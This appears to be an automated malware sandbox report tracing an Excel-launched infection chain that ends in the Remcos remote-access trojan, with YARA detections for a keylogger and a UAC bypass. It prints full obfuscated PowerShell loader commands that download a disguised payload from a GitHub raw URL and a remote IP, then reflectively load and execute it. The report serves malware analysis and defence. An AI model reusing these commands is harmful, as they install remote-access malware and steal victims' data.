                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                                                                              Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                                                                              Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#



                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:05:05:21
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                              Imagebase:0x13fc60000
                                                                                                                                                                              File size:28'253'536 bytes
                                                                                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:05:05:43
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                              Imagebase:0x13fce0000
                                                                                                                                                                              File size:13'824 bytes
                                                                                                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:05:05:45
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:05:05:51
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:05:05:53
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
                                                                                                                                                                              Imagebase:0x13f530000
                                                                                                                                                                              File size:2'758'280 bytes
                                                                                                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:05:05:53
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"
                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:05:05:57
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                                                                                                                                                                              Imagebase:0xfff40000
                                                                                                                                                                              File size:168'960 bytes
                                                                                                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:05:05:58
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:05:06:00
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:05:06:02
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                              Imagebase:0x13ffa0000
                                                                                                                                                                              File size:13'824 bytes
                                                                                                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:05:06:05
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:05:06:07
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:05:06:09
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:05:06:10
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                                                                                                                                                                              Imagebase:0x13f6b0000
                                                                                                                                                                              File size:2'758'280 bytes
                                                                                                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:05:06:10
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:05:06:13
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:25
                                                                                                                                                                              Start time:05:06:13
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:05:06:14
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:27
                                                                                                                                                                              Start time:05:06:14
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                                                                                                                                                                              Imagebase:0xff340000
                                                                                                                                                                              File size:168'960 bytes
                                                                                                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:05:06:15
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = 
[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:05:06:17
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:05:06:24
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
